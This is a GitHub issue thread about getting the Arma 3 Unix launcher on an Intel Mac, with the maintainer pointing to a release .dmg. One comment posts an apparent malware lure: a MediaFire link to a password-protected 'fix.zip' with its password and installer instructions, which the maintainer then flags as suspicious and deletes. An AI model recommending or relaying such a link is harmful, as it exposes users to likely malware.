### ISSUE TITLE
Where's Arma 3 launcher port for Macs with Intel CPU?

### ISSUE THREAD

**Issue by RobertMoper** [muttleyxd/arma3-unix-launcher#282]
If port was created for only Apple Silicon,please create Arma 3 launcher for macs with Intel CPU!I'm on iMac 2020 with 6-core Intel Core i5 3,3Ghz

**Comment by muttleyxd** [comment]
https://github.com/muttleyxd/arma3-unix-launcher/releases/tag/commit-413

There is file ending with ".dmg". It's the launcher for Intel CPUs, there are no builds for ARM yet.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by muttleyxd** [comment]
Do not download any random files from outside this repository. 

I have just deleted a comment from user `bkbaloon` containing a suspicious link to encrypted zip file on mediafire. Can't tell if it's legit but it probably isn't

**Comment by RobertMoper** [comment]
> https://github.com/muttleyxd/arma3-unix-launcher/releases/tag/commit-413
> 
> There is file ending with ".dmg". It's the launcher for Intel CPUs, there are no builds for ARM yet.

Is this for 32-bit macs?

**Comment by RobertMoper** [comment]
> Do not download any random files from outside this repository.
> 
> I have just deleted a comment from user `bkbaloon` containing a suspicious link to encrypted zip file on mediafire. Can't tell if it's legit but it probably isn't

Okay,but please answer my question: is this for 32-bit macs?
